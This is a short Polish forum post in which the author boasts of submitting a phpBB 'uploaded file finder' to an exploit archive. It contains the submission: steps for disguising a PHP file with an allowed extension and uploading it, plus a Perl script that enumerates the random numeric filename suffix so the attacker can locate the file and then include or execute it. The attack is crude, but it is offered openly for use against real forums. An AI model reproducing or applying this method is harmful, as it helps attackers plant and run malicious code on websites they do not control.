Hehe, poszlo na milw0rm.com, dostalem maila zwrotnego z zapytaniem na jakich wersjach to dziala bo w pierwszym liscie tego nie napisalem,
Kod:
phpBB forum (all versions) uploadet file finder
# created by tqm & gogulas(at)wp(dot)pl _hack.pl_
# when you upload a file in phpBB forum the deflaut url for this file is:
# localhost/forum/files/yourfilename_xxx.yyy
# where xxx is random number and yyy is extension
# just rename your php file to rar execution
# (or any other repsected by the forum) and upload
# here is a script to find this file:
#!/usr/bin/perl
use strict;
for (my $cnt=0; $cnt <= 999; $cnt++) {
printf("iexplore www.forum.com/forum/files/nameoffile_%03d.yyy\n", $cnt);
}
# run with parametr script.pl>>files.bat
# move files.bat to c:\program files\internet explorer\
# run it and keep closing IE windows until you shoot the corret one
# then you can include it or anything else :)
hehe, jak to zamieszcza to oficjalnie przejde na poziom "regular lame lvl 2"
mocno nakaleczylem j. angielski?